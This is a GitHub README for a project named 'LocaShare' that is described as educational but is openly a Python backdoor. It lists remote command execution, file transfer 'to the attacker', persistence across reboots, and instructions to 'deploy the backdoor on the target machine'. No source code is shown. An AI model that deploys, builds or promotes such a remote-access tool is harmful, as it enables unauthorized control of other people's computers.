Skip to content

Latest commit

 

History

History
59 lines (35 loc) · 1.21 KB

File metadata and controls

59 lines (35 loc) · 1.21 KB

LocaShare

A simple localshare implementation for educational purposes.

Features

  • Basic Commands: Execute basic system commands remotely.
  • File Upload/Download: Transfer files between the target machine and the attacker.
  • Persistence: Maintain access to the target machine even after reboots.
  • Cross-Platform: Works on Windows, Linux, and macOS.

Getting Started

Prerequisites

  • Python 3.x
  • Pip (Python package installer)

Installation

  1. Clone the repository:

    git clone https://github.com/Pra-kas/LocalShare.git
    cd Backdoor
    

Usage

  • Start the server:
python server.py
  • Deploy the backdoor on the target machine:
python client.py 

Interact with the backdoor using the server.

Contribution

Contributions are welcome! Please follow our contribution guidelines.

License

This project is licensed under the MIT License - see the LICENSE file for details.

Acknowledgments

Socket Programming in Python Argparse Tutorial sql

Feel free to further customize the content based on your project's specific details.